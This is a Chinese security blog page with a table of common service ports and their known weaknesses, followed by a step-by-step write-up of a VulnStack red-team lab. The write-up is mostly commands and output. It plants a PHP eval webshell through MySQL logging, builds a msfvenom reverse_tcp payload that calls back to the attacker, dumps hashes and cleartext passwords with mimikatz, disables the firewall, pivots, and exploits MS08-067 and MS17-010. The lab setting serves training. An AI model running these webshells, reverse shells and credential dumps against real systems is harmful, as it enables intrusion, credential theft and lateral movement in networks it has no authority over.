      <meta itemprop="name" content="zrools">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zrools">
    </span>

    
      <header class="post-header">

        
          <h1 class="post-title" itemprop="name headline">
                
                <a class="post-title-link" href="/2020/03/11/%E5%B8%B8%E8%A7%81%E6%9C%8D%E5%8A%A1%E7%AB%AF%E5%8F%A3%E4%B8%8E%E5%88%A9%E7%94%A8/" itemprop="url">常见服务端口与利用</a></h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-03-11T22:02:40+08:00">
                2020-03-11
              </time>
            

          </span>

          
        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
            <table>
<thead>
<tr>
<th>类型</th>
<th>端口</th>
<th>内容</th>
<th>备注</th>
</tr>
</thead>
<tbody><tr>
<td>FTP</td>
<td>21</td>
<td>文件传输协议，File Transfer Protocol</td>
<td>弱口令、匿名访问、拒绝服务</td>
</tr>
<tr>
<td>SSH</td>
<td>22</td>
<td>安全外壳协议， Secure Shell</td>
<td>弱口令、匿名访问、私钥泄漏</td>
</tr>
<tr>
<td>Telnet</td>
<td>23</td>
<td>远程登录服务协议</td>
<td>弱口令 匿名访问</td>
</tr>
<tr>
<td>Samba</td>
<td>139/445(TCP) <br> 137/138(UDP)</td>
<td>SMB资源共享服务</td>
<td>命令执行(CVE-2017-7494)</td>
</tr>
<tr>
<td>SNMP</td>
<td>161</td>
<td>简单网络管理协议</td>
<td>弱口令</td>
</tr>
<tr>
<td>LADP</td>
<td>389</td>
<td>轻型目录访问协议，Lightweight Directory Access Protocol</td>
<td>匿名访问、LADP注入</td>
</tr>
<tr>
<td>SSL</td>
<td>443</td>
<td>安全套接层，Secure Sockets Layer</td>
<td>OpenSSL心脏出血</td>
</tr>
<tr>
<td>SMB</td>
<td>445</td>
<td>信息服务块，Server Messages Block</td>
<td>MS08-067、MS17-010</td>
</tr>
<tr>
<td>Rsync</td>
<td>875</td>
<td>数据镜像备份工具</td>
<td>匿名访问</td>
</tr>
<tr>
<td>MSSQL</td>
<td>1433</td>
<td>SQL Server数据库服务器</td>
<td>弱口令</td>
</tr>
<tr>
<td>Oracle</td>
<td>1521</td>
<td>数据库管理系统</td>
<td>弱口令</td>
</tr>
<tr>
<td>ZooKeeper</td>
<td>2181\2888\3888</td>
<td>分布式应用程序协调服务</td>
<td>未授权访问</td>
</tr>
<tr>
<td>MySQL</td>
<td>3306</td>
<td>关系型数据库管理系统</td>
<td>弱口令、UDF提权、MOF提权、日志写Shell</td>
</tr>
<tr>
<td>RDP</td>
<td>3389</td>
<td>远程桌面协议</td>
<td>弱口令、CVE2019-0708</td>
</tr>
<tr>
<td>PostgreSQL</td>
<td>5432</td>
<td>对象-关系型数据库管理系统</td>
<td>弱口令</td>
</tr>
<tr>
<td>CouchDB</td>
<td>5984(HTTP)<br> 6984(HTTPS)</td>
<td>开源的面向文档的数据库管理系统</td>
<td>未授权访问</td>
</tr>
<tr>
<td>VNC</td>
<td>5900</td>
<td>虚拟网络控制台，Virtual Network Console</td>
<td>弱口令</td>
</tr>
<tr>
<td>Redis</td>
<td>6379</td>
<td>远程字典服务，Remote Dictionary Server</td>
<td>未授权(getshell、ssh私钥、计划任务)</td>
</tr>
<tr>
<td>Weblogic</td>
<td>7001/7002</td>
<td>基于JavaEE架构的中间件</td>
<td>反序列化、弱口令、SSRF</td>
</tr>
<tr>
<td>JBoss</td>
<td>8080/8093</td>
<td>基于JavaEE的应用服务器</td>
<td>弱口令、反序列化</td>
</tr>
<tr>
<td>Jenkins</td>
<td>8080</td>
<td>基于Java的持续集成工具</td>
<td>弱口令、反序列化</td>
</tr>
<tr>
<td>Tomcat</td>
<td>8080</td>
<td>Web 应用服务器</td>
<td>弱口令</td>
</tr>
<tr>
<td>WebSphere</td>
<td>9043</td>
<td>IBM的模块化的平台</td>
<td>未授权、反序列化、弱口令(admin/password)</td>
</tr>
<tr>
<td>Zabbix</td>
<td>10051</td>
<td>SQL注入、弱口令</td>
<td>弱口令(zabbix/zabbix)、SQL注入</td>
</tr>
<tr>
<td>MemCache</td>
<td>11211</td>
<td>分布式的高速缓存系统</td>
<td>未授权、UDP放大反射</td>
</tr>
<tr>
<td>MongoDB</td>
<td>27017/27018</td>
<td>分布式文件存储数据库</td>
<td>未授权、注入</td>
</tr>
<tr>
<td>SAP</td>
<td>50000</td>
<td>System Applications and Products</td>
<td>命令注入</td>
</tr>
<tr>
<td>Hadoop</td>
<td>50030/50070</td>
<td>分布式系统基础架构</td>
<td>未授权、命令注入</td>
</tr>
</tbody></table>

          
    </div>
    
    
    <footer class="post-footer">
      

        <div class="post-eof"></div>
      
    </footer>
  </div>
  
  
  </article>


  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/03/09/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E8%AF%84%E4%BC%B0%E5%AE%9E%E6%88%98-%E4%B8%80-Writeup/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="zrools">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zrools">
    </span>

    
      <header class="post-header">

        
          <h1 class="post-title" itemprop="name headline">
                
                <a class="post-title-link" href="/2020/03/09/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E8%AF%84%E4%BC%B0%E5%AE%9E%E6%88%98-%E4%B8%80-Writeup/" itemprop="url">VulnStack - ATT&CK红队评估实战(一) Writeup</a></h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-03-09T13:48:56+08:00">
                2020-03-09
              </time>
            

          </span>

          
        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
            <h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><ul>
<li><strong>项目地址</strong></li>
</ul>
<p><a href="http://vulnstack.qiyuanxuetang.net/vuln/detail/2/" target="_blank" rel="noopener">http://vulnstack.qiyuanxuetang.net/vuln/detail/2/</a></p>
<ul>
<li><strong>网络拓扑</strong></li>
</ul>
<p><img src="/images/2020/03/09/00.png" alt=""></p>
<h3 id="环境说明"><a href="#环境说明" class="headerlink" title="环境说明"></a>环境说明</h3><p>下载回来有三个虚拟机：</p>
<ul>
<li><strong>VM1:</strong> vulnstack-win7</li>
<li><strong>VM2:</strong> vulnstack-Win2K3 Metasploitable</li>
<li><strong>VM3:</strong> vulnstack-winserver08</li>
</ul>
<p>提供的是VMware直接打包的虚拟机文件(<code>.vmdk</code>)，使用VMWare的根据官方提供的截图配置就可以了，由于我是Linux环境，装的是VirtualBox，需要稍作调整，根据项目截图的网络配置：</p>
<ul>
<li><strong>192.168.54.0/24：</strong> Web服务环境，在VBox中用Host-only Adapter(主机模式)</li>
<li><strong>192.168.72.0/24：</strong> 域内网环境，在VBox中用Internal(内网模式) </li>
</ul>
<p>宿主机充当测试机，这里只配置三台虚拟机网络就可以了，<code>Host-only Adapter</code>直接在菜单栏里添加，<code>Internal</code>在网卡适配器填入相同的名称，比如<code>intnet0</code>，网卡配置：</p>
<ul>
<li><strong>vulnstack-win7：</strong> intnet0、vboxnet0</li>
<li><strong>vulnstack-Win2K3 Metasploitable：</strong> intnet0</li>
<li><strong>vulnstack-winserver08：</strong> intnet0</li>
</ul>
<p>由于没有快照文件，使用VirtualBox各建一个虚拟机附加相应的<code>.vmdk</code>文件，然后在网卡配置选择对应的模式和网络。</p>
<p><img src="/images/2020/03/09/01.png" alt=""></p>
<p>接着登录各个VM设置固定IP，内网域成员主机网卡DNS地址指向域控IP地址，三个VM的IP分别为：</p>
<ul>
<li><strong>VM1(Win7)：</strong> 192.168.54.3(vboxnet0)、192.168.72.104(intnet0)</li>
<li><strong>VM2(W2003)：</strong> 192.168.72.103(intnet0)</li>
<li><strong>VM3(W2008):</strong> 192.168.72.102(intnet0)</li>
</ul>
<p>由于VM2和VM3都在内网，要对其进行渗透首先得拿下VM1 Web服务器的权限，再作为跳板进入内网横向移动。各个VM都有着比较多的服务，这里只挑比较容易的来练习，主要是获取服务器SYSTEM权限。</p>
<p>本文使用到的工具：</p>
<ul>
<li>Metasploit Framework： Kali Linux</li>
<li>Ladon： <a href="https://github.com/k8gege/Ladon.git" target="_blank" rel="noopener">https://github.com/k8gege/Ladon.git</a></li>
<li>dirmap： <a href="https://github.com/H4ckForJob/dirmap.git" target="_blank" rel="noopener">https://github.com/H4ckForJob/dirmap.git</a></li>
</ul>
<h3 id="注意事项："><a href="#注意事项：" class="headerlink" title="注意事项："></a>注意事项：</h3><ul>
<li>VM1(Win7)的Web服务需要进去手动启动phpStudy(C:/phpStudy)；</li>
<li>VM2(Win2003)的<code>.vmdk</code>拷过来附加到VirtualBox发生MBR引导错误出现：<code>error loading operating system</code>，用GHOST复制修复一下虚拟磁盘，如果启动蓝屏，试试勾选APIC (虚拟机配置System选项)和把接口改为<code>SCSI</code>：</li>
</ul>
<p><img src="/images/2020/03/09/03.png" alt=""></p>
<p>如果Win2003如果开机发现没有域登录选项，需要重新手动加入域，登录界面才有域登录选项：</p>
<p><img src="/images/2020/03/09/02.png" alt=""></p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><h3 id="端口扫描-amp-Web目录扫描"><a href="#端口扫描-amp-Web目录扫描" class="headerlink" title="端口扫描 &amp; Web目录扫描"></a>端口扫描 &amp; Web目录扫描</h3><p>使用nmap对VM1(192.168.54.3)进行端口扫描：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$ nmap 192.168.54.3</span><br><span class="line"></span><br><span class="line">Nmap scan report for 192.168.54.3</span><br><span class="line">Host is up (0.00044s latency).</span><br><span class="line">Not shown: 998 filtered ports</span><br><span class="line">PORT     STATE SERVICE</span><br><span class="line">80&#x2F;tcp   open  http</span><br><span class="line">3306&#x2F;tcp open  mysql</span><br></pre></td></tr></table></figure>

<p>80端口打开就是一个探针页面：</p>
<p><img src="/images/2020/03/09/04.png" alt=""></p>
<p>再进一步收集Web目录和文件信息：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ python3 dirmap.py -i http:&#x2F;&#x2F;192.168.54.3 -lcf</span><br></pre></td></tr></table></figure>
<p><img src="/images/2020/03/09/05.png" alt=""></p>
<p>发现<code>phpinfo.php</code>、<code>phpmyadmin</code>、<code>beifen.rar</code>等信息。</p>
<h3 id="phpMyAdmin-GetShell"><a href="#phpMyAdmin-GetShell" class="headerlink" title="phpMyAdmin GetShell"></a>phpMyAdmin GetShell</h3><p>直接<code>root/root</code>弱口令登录成功。</p>
<ol>
<li>由于在探针知道绝对路径为：<code>C:/phpStudy/WWW</code>，查看<code>secure_file_priv</code>，看是否可以使用导出写WebShell：</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select &#39;&lt;?php eval($_POST[cmd]); ?&gt;&#39; into outfile &#39;C:&#x2F;phpStudy&#x2F;WWW&#x2F;z.php&#39;;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show global variables like &#39;%secure%&#39;;</span><br></pre></td></tr></table></figure>

<p>显示为<code>NULL</code>，表示限制，不允许导入导出。</p>
<blockquote>
<p>注意：这个配置需要在 my.ini 文件修改。</p>
</blockquote>
<ol start="2">
<li>使用日志写Shell</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show variables  like  &#39;%general%&#39;;</span><br></pre></td></tr></table></figure>

<p><code>general_log</code>显示为<code>OFF</code>，尝试开启并更改日志目录：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">set global general_log&#x3D;on;</span><br><span class="line"></span><br><span class="line">set global general_log_file&#x3D;&#39;C:&#x2F;phpStudy&#x2F;WWW&#x2F;z.php&#39;;</span><br></pre></td></tr></table></figure>

<p>写WebShell，顺便关闭日志：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">SELECT &#39;&lt;?php eval($_POST[&quot;cmd&quot;]);?&gt;&#39;;</span><br><span class="line"></span><br><span class="line">SET GLOBAL general_log &#x3D; off;</span><br></pre></td></tr></table></figure>

<p>antSword连上：</p>
<p><img src="/images/2020/03/09/06.png" alt=""></p>
<h3 id="CMS后台GetShell"><a href="#CMS后台GetShell" class="headerlink" title="CMS后台GetShell"></a>CMS后台GetShell</h3><p>接着再看一下<code>beifen.rar</code>这个文件，下载解压后是个<code>yxcms</code>文件夹，访问<code>yxcms</code>目录正是站点，直奔后台：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;192.168.54.3&#x2F;yxcms&#x2F;index.php?r&#x3D;admin&#x2F;index&#x2F;login</span><br></pre></td></tr></table></figure>

<p>尝试<code>admin/123456</code>弱口令登录成功，然后在模板文件管理直接写Shell就可以了：</p>
<p><img src="/images/2020/03/09/07.png" alt=""></p>
<h2 id="内网搜集"><a href="#内网搜集" class="headerlink" title="内网搜集"></a>内网搜集</h2><p>结合WebShell反弹Shell到MSF进行内网渗透：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ msfvenom -p windows&#x2F;meterpreter&#x2F;reverse_tcp lhost&#x3D;192.168.54.1 lport&#x3D;5555 -f exe &gt; shell.exe</span><br></pre></td></tr></table></figure>

<p>使用antSword上传<code>shell.exe</code>到Web服务器，然后在终端执行：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">$ msfconsole</span><br><span class="line"></span><br><span class="line">msf5 &gt; use exploit&#x2F;multi&#x2F;handler </span><br><span class="line"></span><br><span class="line">msf5 exploit(multi&#x2F;handler) &gt; set payload windows&#x2F;meterpreter&#x2F;reverse_tcp</span><br><span class="line"></span><br><span class="line">msf5 exploit(multi&#x2F;handler) &gt; set lhost 192.168.54.1</span><br><span class="line"></span><br><span class="line">msf5 exploit(multi&#x2F;handler) &gt; set lport 5555</span><br><span class="line"></span><br><span class="line">msf5 exploit(multi&#x2F;handler) &gt; exploit</span><br></pre></td></tr></table></figure>

<p><img src="/images/2020/03/09/08.png" alt=""></p>
<p>Administrator权限，直接<code>getsystem</code>提权：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; getsystem</span><br></pre></td></tr></table></figure>

<p><img src="/images/2020/03/09/09.png" alt=""></p>
<p>使用<code>mimikatz</code>抓hash：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; load mimikatz</span><br><span class="line">meterpreter &gt; mimikatz_command -f samdump::hashes</span><br><span class="line">Ordinateur : stu1.god.org</span><br><span class="line">BootKey    : fd4639f4e27c79683ae9fee56b44393f</span><br><span class="line"></span><br><span class="line">Rid  : 500</span><br><span class="line">User : Administrator</span><br><span class="line">LM   : </span><br><span class="line">NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0</span><br><span class="line"></span><br><span class="line">Rid  : 501</span><br><span class="line">User : Guest</span><br><span class="line">LM   : </span><br><span class="line">NTLM : </span><br><span class="line"></span><br><span class="line">Rid  : 1000</span><br><span class="line">User : liukaifeng01</span><br><span class="line">LM   : </span><br><span class="line">NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0</span><br></pre></td></tr></table></figure>

<p>用<code>wdigest</code>明文密码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; wdigest</span><br><span class="line">[+] Running as SYSTEM</span><br><span class="line">[*] Retrieving wdigest credentials</span><br><span class="line">wdigest credentials</span><br><span class="line">&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;</span><br><span class="line"></span><br><span class="line">AuthID    Package    Domain        User           Password</span><br><span class="line">------    -------    ------        ----           --------</span><br><span class="line">0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  </span><br><span class="line">0;25306   NTLM                                    </span><br><span class="line">0;248138  Kerberos   GOD           Administrator  Hongrisec@2019</span><br></pre></td></tr></table></figure>

<blockquote>
<p>注意： 使用<code>mimikatz</code>抓明文之前先将<code>PID</code>迁移得到64位进程上，不然可能导致抓不到明文。</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; migrate 400   #  400 是 winlogon.exe 的 PID</span><br></pre></td></tr></table></figure>

<h3 id="端口信息收集"><a href="#端口信息收集" class="headerlink" title="端口信息收集"></a>端口信息收集</h3><p>从<code>ifconfig /all</code>得知Web服务器有两个网卡，为了方便，直接上传<code>Ladon</code>进行内网主机端口信息收集：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; upload &#x2F;root&#x2F;Tools&#x2F;Ladon&#x2F;Ladon.exe C:&#x2F;phpStudy&#x2F;backup</span><br><span class="line"></span><br><span class="line">meterpreter &gt; shell</span><br><span class="line"></span><br><span class="line">C:\Windows\system32&gt;cd C:&#x2F;phpStudy&#x2F;backup</span><br><span class="line"></span><br><span class="line">C:\phpStudy\backup&gt;Ladon.exe 192.168.72.1&#x2F;24 PortScan</span><br></pre></td></tr></table></figure>

<p><img src="/images/2020/03/09/10.png" alt=""></p>
<p>得到2个存活主机，主要开放端口：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">192.168.72.102 80       Default is Web</span><br><span class="line">192.168.72.102 389      Default is LDAP</span><br><span class="line">192.168.72.102 445      Default is SMB</span><br><span class="line"></span><br><span class="line">192.168.72.103 21       Default is FTP -&gt; 220 Microsoft FTP Service</span><br><span class="line">192.168.72.103 7001     Default is Weblogic</span><br><span class="line">192.168.72.103 7002     Maybe is Weblogic</span><br><span class="line">192.168.72.103 445      Default is SMB</span><br></pre></td></tr></table></figure>

<h2 id="横向渗透"><a href="#横向渗透" class="headerlink" title="横向渗透"></a>横向渗透</h2><h3 id="系统指纹识别"><a href="#系统指纹识别" class="headerlink" title="系统指纹识别"></a>系统指纹识别</h3><p>从端口判断102可能是主域机器，103是域成员，使用<code>Ladon</code>对<code>192.168.72.103</code>系统指纹识别：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">C:\phpStudy\backup&gt;Ladon.exe 192.168.72.103 OsScan</span><br><span class="line">Ladon.exe 192.168.72.103 OsScan</span><br><span class="line">Ladon 6.0</span><br><span class="line">By K8gege</span><br><span class="line">Start: 2020&#x2F;2&#x2F;20 14:16:10</span><br><span class="line">192.168.72.103</span><br><span class="line">load OsScan</span><br><span class="line">IP      Mac     Domain&#x2F;HostName OSversion&#x2F;Service       Vendor</span><br><span class="line">192.168.72.103  08-00-27-D4-EE-57       god.org\ROOT-WIN2003    [Win 2003 3790]</span><br><span class="line">IP Finished!</span><br></pre></td></tr></table></figure>

<p>是台<code>Win2003</code>，开了<code>445</code>端口，尝试拿<code>MS08-067</code>打。</p>
<h3 id="添加路由"><a href="#添加路由" class="headerlink" title="添加路由"></a>添加路由</h3><p>首先添加路由，使用Web服务器作为跳板访问<code>Win2003</code>：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; run autoroute -s 192.168.72.0&#x2F;24</span><br><span class="line"></span><br><span class="line">meterpreter &gt; run autoroute -p</span><br></pre></td></tr></table></figure>

<p><img src="/images/2020/03/09/11.png" alt=""></p>
<h3 id="Bind-TCP"><a href="#Bind-TCP" class="headerlink" title="Bind TCP"></a>Bind TCP</h3><p>接着<code>MS08-067</code>搭配<code>Bind TCP</code>使用：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; background </span><br><span class="line"></span><br><span class="line">msf5 exploit(multi&#x2F;handler) &gt; use exploit&#x2F;windows&#x2F;smb&#x2F;ms08_067_netapi</span><br><span class="line"></span><br><span class="line">msf5 exploit(windows&#x2F;smb&#x2F;ms08_067_netapi) &gt; set rhost 192.168.72.103</span><br><span class="line"></span><br><span class="line">msf5 exploit(windows&#x2F;smb&#x2F;ms08_067_netapi) &gt; set payload windows&#x2F;meterpreter&#x2F;bind_tcp</span><br><span class="line"></span><br><span class="line">msf5 exploit(windows&#x2F;smb&#x2F;ms08_067_netapi) &gt; exploit</span><br></pre></td></tr></table></figure>

<p><img src="/images/2020/03/09/12.png" alt=""></p>
<p>成功反弹Shell回来，抓下hash：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; mimikatz_command -f samdump::hashes</span><br><span class="line">Ordinateur : root-win2003.god.org</span><br><span class="line">BootKey    : 5d587d9451170f6b9b246da09ad82ab9</span><br><span class="line"></span><br><span class="line">Rid  : 500</span><br><span class="line">User : Administrator</span><br><span class="line">LM   : a9a1d510b01177d1aad3b435b51404ee</span><br><span class="line">NTLM : afc44ee7351d61d00698796da06b1ebf</span><br><span class="line"></span><br><span class="line">Rid  : 501</span><br><span class="line">User : Guest</span><br><span class="line">LM   : </span><br><span class="line">NTLM :</span><br></pre></td></tr></table></figure>

<blockquote>
<p><code>mimikatz</code>明文没抓成功，开始缺少<code>fltlib.dll</code>，打上能运行，抓明文报错，换<code>wce.exe</code>也运行报错，可能是我这里环境问题。</p>
</blockquote>
<h2 id="构建通道"><a href="#构建通道" class="headerlink" title="构建通道"></a>构建通道</h2><h3 id="端口转发"><a href="#端口转发" class="headerlink" title="端口转发"></a>端口转发</h3><p>扫描端口的时候103开放了21端口，使用MSF进行端口转发到本地，回到MSF session 1 (Win7)：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; background </span><br><span class="line">[*] Backgrounding session 2...</span><br><span class="line">msf5 exploit(windows&#x2F;smb&#x2F;ms08_067_netapi) &gt; sessions 1</span><br><span class="line">[*] Starting interaction with 1...</span><br><span class="line">meterpreter &gt; portfwd add -L 192.168.54.1 -l 2121 -p 21 -r 192.168.72.103</span><br><span class="line">[*] Local TCP relay created: 192.168.54.1:2121 &lt;-&gt; 192.168.72.103:21</span><br><span class="line">meterpreter &gt; portfwd list</span><br><span class="line"></span><br><span class="line">Active Port Forwards</span><br><span class="line">&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;</span><br><span class="line"></span><br><span class="line">   Index  Local              Remote             Direction</span><br><span class="line">   -----  -----              ------             ---------</span><br><span class="line">   1      192.168.54.1:2121  192.168.72.103:21  Forward</span><br><span class="line"></span><br><span class="line">1 total active port forwards.</span><br></pre></td></tr></table></figure>

<h3 id="本地访问"><a href="#本地访问" class="headerlink" title="本地访问"></a>本地访问</h3><p><code>192.168.72.103</code>的<code>21</code>端口转发到<code>192.168.54.1</code>的<code>2121</code>端口，在攻击机上直接访问：</p>
<p><code>ftp://192.168.54.1:2121</code></p>
<p><img src="/images/2020/03/09/13.png" alt=""></p>
<h2 id="渗透域控"><a href="#渗透域控" class="headerlink" title="渗透域控"></a>渗透域控</h2><h3 id="MS17-010"><a href="#MS17-010" class="headerlink" title="MS17-010"></a>MS17-010</h3><p>前面扫描端口开着<code>445</code>，验证有<code>MS17-010</code>漏洞，尝试拿<code>exploit/windows/smb/ms17_010_eternalblue</code>和<code>windows/x64/meterpreter/bind_tcp</code>直接打<code>192.168.72.102</code>，很耗时，而且session很大概率直接就<code>died</code>了。</p>
<p>拿<code>exploit/windows/smb/ms17_010_psexec</code>出现了<code>Exploit completed, but no session was created.</code>，没有session。</p>
<ul>
<li><strong>系统防火墙</strong></li>
</ul>
<p>估计是被防火墙干掉了，尝试用<code>ms17_010_command</code>先关掉它：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">msf5 exploit(windows&#x2F;smb&#x2F;ms17_010_psexec) &gt; use auxiliary&#x2F;admin&#x2F;smb&#x2F;ms17_010_command</span><br><span class="line"></span><br><span class="line">msf5 auxiliary(admin&#x2F;smb&#x2F;ms17_010_command) &gt; set rhosts 192.168.72.102</span><br><span class="line"></span><br><span class="line">msf5 auxiliary(admin&#x2F;smb&#x2F;ms17_010_command) &gt; set command &quot;netsh advfirewall set allprofiles state off&quot;</span><br><span class="line"></span><br><span class="line">msf5 auxiliary(admin&#x2F;smb&#x2F;ms17_010_command) &gt; exploit</span><br></pre></td></tr></table></figure>

<p><img src="/images/2020/03/09/14.png" alt=""></p>
<ul>
<li><strong>MS17-010 和 Bind TCP</strong></li>
</ul>
<p>接着再拿<code>ms17_010_psexec</code>和<code>bind_tcp</code>打一次：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">msf5 exploit(windows&#x2F;smb&#x2F;ms17_010_psexec) &gt; use exploit&#x2F;windows&#x2F;smb&#x2F;ms17_010_psexec</span><br><span class="line"></span><br><span class="line">msf5 exploit(windows&#x2F;smb&#x2F;ms17_010_psexec) &gt; set rhosts 192.168.72.102</span><br><span class="line"></span><br><span class="line">msf5 exploit(windows&#x2F;smb&#x2F;ms17_010_psexec) &gt; set payload windows&#x2F;x64&#x2F;meterpreter&#x2F;bind_tcp</span><br><span class="line"></span><br><span class="line">msf5 exploit(windows&#x2F;smb&#x2F;ms17_010_psexec) &gt; exploit</span><br></pre></td></tr></table></figure>

